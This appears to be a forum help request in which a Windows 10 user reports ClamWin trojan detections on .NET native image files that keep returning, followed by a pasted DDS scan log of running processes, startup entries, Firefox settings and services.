C:\Windows\assembly\NativeImages_v2.0.50727_32\MSBuild\fcf362b1b376f26213544099deb80ea2\MSBuild.ni.exe: Win.Trojan.Agent-5331045-0 FOUND

C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\80d1ac155ebe0ec86c15490d0c15f04e\Microsoft.PowerShell.ConsoleHost.ni.dll: Win.Trojan.Agent-5312173-0 FOUND

Malwarebytes and Window defender find nothing when I run them and after I delete these, they comeback.

DSS Scan:
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.14393.0
Run by Op980 at 8:43:23 on 2017-01-06
Microsoft Windows 10 Pro 10.0.14393.0.1252.1.1033.18.8182.6313 [GMT -8:00]
.
AV: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\Windows\system32\nvvsvc.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\WINDOWS\system32\nvvsvc.exe
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\System32\spoolsv.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Canon\DIAS\CnxDIAS.exe
C:\Windows\SysWOW64\ASTSRV.EXE
C:\Program Files (x86)\DYMO\DYMO Label Software\DymoPnpService.exe
C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
C:\WINDOWS\system32\svchost.exe -k iissvcs
C:\WINDOWS\system32\svchost.exe -k apphost
C:\WINDOWS\system32\mqsvc.exe
C:\Program Files\Common Files\Nitro PDF\Express\2.0\NitroPDFExpressDriverServicex64.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\WINDOWS\system32\dashost.exe
C:\Windows\System32\WUDFHost.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\Windows\System32\WUDFHost.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\WINDOWS\system32\taskhostw.exe
C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
C:\Program Files (x86)\TeamViewer\TeamViewer.exe
C:\WINDOWS\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files (x86)\TeamViewer\tv_w32.exe
C:\Program Files (x86)\TeamViewer\tv_x64.exe
C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.1.41.0_x64__8wekyb3d8bbwe\Microsoft.StickyNotes.exe
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgentUserBroker.exe
C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
C:\Program Files\Canon\Canon MF Network Scan Utility\CNMFSUT6.EXE
C:\Program Files\Windows Defender\MSASCuiL.exe
C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe
C:\Program Files (x86)\DYMO\DYMO Label Software\DymoQuickPrint.exe
C:\Program Files (x86)\ClamWin\bin\ClamTray.exe
C:\Windows\System32\SystemSettingsBroker.exe
C:\Program Files\CCleaner\CCleaner64.exe
C:\Program Files\Windows Defender\MpCmdRun.exe
C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.145.0_x64__kzf8qxf38zg5c\SkypeHost.exe
C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\WINDOWS\system32\AUDIODG.EXE
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\Windows\System32\smartscreen.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uSearch Bar = Preserve
uRun: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
uRun: [Fitbit Connect] "C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe" /autorun
uRun: [7 Taskbar Tweaker] "C:\Users\Op980\AppData\Roaming\7+ Taskbar Tweaker\7+ Taskbar Tweaker.exe" -hidewnd
uRun: [DymoQuickPrint] "C:\Program Files (x86)\DYMO\DYMO Label Software\DymoQuickPrint.exe" /startup
uRun: [eFax 4.4] "C:\Program Files (x86)\eFax Messenger 4.4\J2GDllCmd.exe" /R
uRun: [OneDrive] "C:\Users\Op980\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRunOnce: [Uninstall C:\Users\Op980\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64] C:\WINDOWS\System32\cmd.exe /q /c rmdir /s /q "C:\Users\Op980\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64"
mRun: [ClamWin] "C:\Program Files (x86)\ClamWin\bin\ClamTray.exe" --logon
mRun: [SunJavaUpdateSched] C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
mRun: [PMSpeed9.39.10] C:\Program Files (x86)\NewSoft\Presto! PageManager 9.39\PMSpeed.EXE
mRun: [Canon Toner Status] C:\Program Files (x86)\Canon\OIPTonerStatus\CnTnrStsTask.exe
mRun: [ProductUpdater] C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-System: DSCAutomationHostEnabled = dword:2
IE: E&xport to Microsoft Excel - C:\Program Files (x86)\Microsoft Office\Office10\EXCEL.EXE/3000
IE: SafeKey Fill Forms - C:\Users\Op980\AppData\LocalLow\SafeKey\context.html?cmd=fillforms
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{0d1f47eb-cfb7-47c0-8e9e-4be045c4fb01} : DHCPNameServer = 75.75.75.75 75.75.76.76
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-mStart Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wcg_fremkfs_16_39&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0A0CtBtBtD0BzytC0DyEyEtDtAzzyDtCtN0D0Tzu0StCyBtAyCtN1L2XzutAtFtByEtFyCtFyDtBtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StC0E0E0BtBzz0DyBtGtAyCyD0DtGyDyB0BtAtGyE0Ezy0CtGtCtAzy0CtD0CtCyDzyzztCtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0C0CtAyDtCyC0F0AtGyC0CzzyBtGyE0B0CyEtGzytB0C0DtGzz0CyC0EzzzztBtB0B0DtCzz2QtN0A0LzutB%26cr%3D1456597161%26a%3Dwcg_fremkfs_16_39%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
x64-Run: [MFNetworkScanUtility] C:\Program Files\Canon\Canon MF Network Scan Utility\CNMFSUT6.EXE
x64-Run: [WindowsDefender] "C:\Program Files (x86)\Windows Defender\MSASCuiL.exe"
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Op980\AppData\Roaming\Mozilla\Firefox\Profiles\hrzcafzz.default\
FF - prefs.js: browser.search.selectedEngine - Yahoo! Powered
FF - prefs.js: browser.startup.homepage - www.yahoo.com
FF - prefs.js: keyword.URL - true
FF - plugin: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\DYMO\DYMO Label Software\Framework\npDYMOLabelFramework.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Users\Op980\AppData\Local\Citrix\Plugins\104\npappdetector.dll
FF - plugin: C:\Users\Op980\AppData\Roaming\Zoom\bin\npzoomplugin.dll
FF - plugin: C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll
.
============= SERVICES / DRIVERS ===============
.
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2016-7-16 48152]
R0 iorate;iorate;C:\WINDOWS\System32\drivers\iorate.sys [2016-11-8 48992]
R0 volume;Volume driver;C:\WINDOWS\System32\drivers\volume.sys [2016-7-16 16224]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2016-7-16 107032]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2016-7-16 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2016-10-17 199008]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2016-10-28 227328]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2016-7-16 88576]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2016-7-16 8192]
R2 BRA_Scheduler;Brother BRAdminPro Scheduler;C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe [2013-6-16 98304]
R2 CDPUserSvc_48d4a;CDPUserSvc_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 clreg;Virtual Registry for Containers;C:\WINDOWS\System32\drivers\registry.sys [2016-7-16 70144]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2016-7-16 44496]
R2 DiagTrack;Connected User Experiences and Telemetry;C:\WINDOWS\System32\svchost.exe -k utcsvc [2016-7-16 44496]
R2 DymoPnpService;DYMO PnP Service;C:\Program Files (x86)\DYMO\DYMO Label Software\DymoPnpService.exe [2014-2-3 33072]
R2 Fitbit Connect;Fitbit Connect Service;C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [2013-2-25 1239584]
R2 NitroExpressDriverReadSpool;NitroPDFExpressDriverCreatorReadSpool;C:\Program Files\Common Files\Nitro PDF\Express\2.0\NitroPDFExpressDriverServicex64.exe [2009-10-6 324912]
R2 NvStreamSvc;NVIDIA Streamer Service;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2016-9-4 2521024]
R2 OneSyncSvc_48d4a;Sync Host_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2016-7-16 78336]
R2 TeamViewer;TeamViewer 12;C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [2014-12-11 10351856]
R2 tiledatamodelsvc;Tile Data model server;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R2 UMVPFSrv;UMVPFSrv;C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe [2011-12-14 450848]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 wcifs;Windows Container Isolation;C:\WINDOWS\System32\drivers\wcifs.sys [2016-10-17 119648]
R2 wcnfs;Windows Container Name Virtualization;C:\WINDOWS\System32\drivers\wcnfs.sys [2016-7-16 66560]
R2 WpnService;Windows Push Notifications System Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 e1kexpress;Intel(R) Network Connections Driver K;C:\WINDOWS\System32\drivers\e1k63x64.sys [2013-2-20 498032]
R3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R3 lvrs64;Logitech RightSound Filter Driver;C:\WINDOWS\System32\drivers\lvrs64.sys [2012-10-26 351520]
R3 LVUVC64;@oem29.inf,%PID_082D_DD%(UVC);Logitech HD Pro Webcam C920(UVC);C:\WINDOWS\System32\drivers\lvuvc64.sys [2012-10-26 4758176]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2016-7-16 20480]
R3 NvStreamKms;NvStreamKms;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [2014-10-31 26560]
R3 NvStreamNetworkSvc;NVIDIA Streamer Network Service;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [2015-4-17 3632576]
R3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);C:\WINDOWS\System32\drivers\nvvad64v.sys [2016-9-4 56384]
R3 RtlWlanu_OldIC;Realtek Wireless LAN 802.11n USB 2.0 Network Adapter;C:\WINDOWS\System32\drivers\rtwlanu_oldIC.sys [2016-7-16 3814400]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R3 TimeBrokerSvc;Time Broker;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
R3 UsoSvc;Update Orchestrator Service for Windows Update;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2016-7-16 123232]
R3 WdNisSvc;Windows Defender Network Inspection Service;C:\Program Files\Windows Defender\NisSrv.exe [2016-7-16 347328]
R3 WSDScan;WSD Scan Support;C:\WINDOWS\System32\drivers\WSDScan.sys [2016-7-16 24576]
R3 WUDFWpdMtp;WUDFWpdMtp;C:\WINDOWS\System32\drivers\WUDFRd.sys [2016-7-16 216064]
S2 CDPSvc;Connected Devices Platform Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService [2016-7-16 44496]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2016-9-20 324224]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2016-7-16 18432]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2016-7-16 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2016-7-16 15360]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2016-7-16 44496]
S3 AppvStrm;AppvStrm;C:\WINDOWS\System32\drivers\AppVStrm.sys [2016-10-17 127328]
S3 AppvVemgr;AppvVemgr;C:\WINDOWS\System32\drivers\AppvVemgr.sys [2016-7-16 157024]
S3 AppvVfs;AppvVfs;C:\WINDOWS\System32\drivers\AppvVfs.sys [2016-7-16 141152]
S3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
S3 bcmfn;bcmfn Service;C:\WINDOWS\System32\drivers\bcmfn.sys [2016-7-16 9728]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2016-7-16 9728]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2016-7-16 44496]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2016-7-16 38912]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2016-10-28 118272]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2016-7-16 346976]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2016-7-16 2104160]
S3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2016-7-16 93184]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 embeddedmode;Embedded Mode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 FrameServer;Windows Camera Frame Server;C:\WINDOWS\System32\svchost.exe -k Camera [2016-7-16 44496]
S3 Garmin Device Interaction Service;Garmin Device Interaction Service;C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe [2015-6-10 718792]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2016-7-16 20480]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2016-7-16 50016]
S3 HvHost;HV Host Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2016-7-16 33280]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2016-7-16 81408]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2016-7-16 64512]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2016-7-16 176384]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2016-7-16 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2016-7-16 113152]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2016-7-16 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2016-7-16 526176]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2016-7-16 35840]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2016-7-16 105824]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2016-7-16 101216]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2016-10-17 64352]
S3 MessagingService_48d4a;MessagingService_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2016-7-16 842584]
S3 MsSecFlt;Microsoft Security Events Component Minifilter;C:\WINDOWS\System32\drivers\mssecflt.sys [2016-7-16 179040]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2016-7-16 108896]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library;C:\WINDOWS\System32\drivers\NetAdapterCx.sys [2016-7-16 90624]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2016-7-16 58720]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2016-7-16 61792]
S3 PhoneSvc;Phone Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 PimIndexMaintenanceSvc_48d4a;Contact Data_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2016-7-16 928608]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 scmbus;Microsoft Storage Class Memory Bus Driver;C:\WINDOWS\System32\drivers\scmbus.sys [2016-7-16 88416]
S3 scmdisk0101;Microsoft NVDIMM-N disk driver;C:\WINDOWS\System32\drivers\scmdisk0101.sys [2016-7-16 123904]
S3 Sense;Windows Defender Advanced Threat Protection Service;C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2016-10-17 2889896]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2016-10-17 1312768]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2016-7-16 151904]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2016-7-16 44496]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2016-10-17 81760]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2016-7-16 32096]
S3 TieringEngineService;Storage Tiers Management;C:\WINDOWS\System32\TieringEngineService.exe [2016-7-16 287744]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2016-7-16 95744]
S3 UcmTcpciCx0101;UCM-TCPCI KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmTcpciCx.sys [2016-7-16 108544]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2016-7-16 50688]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2016-7-16 45568]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2016-7-16 28512]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2016-7-16 263008]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2016-7-16 96608]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2016-7-16 137056]
S3 UnistoreSvc_48d4a;User Data Storage_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2016-7-16 28512]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2016-7-16 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2016-7-16 27488]
S3 UserDataSvc_48d4a;User Data Access_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2016-7-16 32256]
S3 vmgid;Microsoft Hyper-V Guest Infrastructure Driver;C:\WINDOWS\System32\drivers\vmgid.sys [2016-7-16 10240]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 vmicvmsession;Hyper-V PowerShell Direct Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 w3logsvc;W3C Logging Service;C:\WINDOWS\System32\svchost.exe -k apphost [2016-7-16 44496]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2016-10-17 719360]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;C:\WINDOWS\System32\svchost.exe -k WepHostSvcGroup [2016-7-16 44496]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2016-7-16 32096]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2016-7-16 64864]
S3 wisvc;Windows Insider Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 workfolderssvc;Work Folders;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
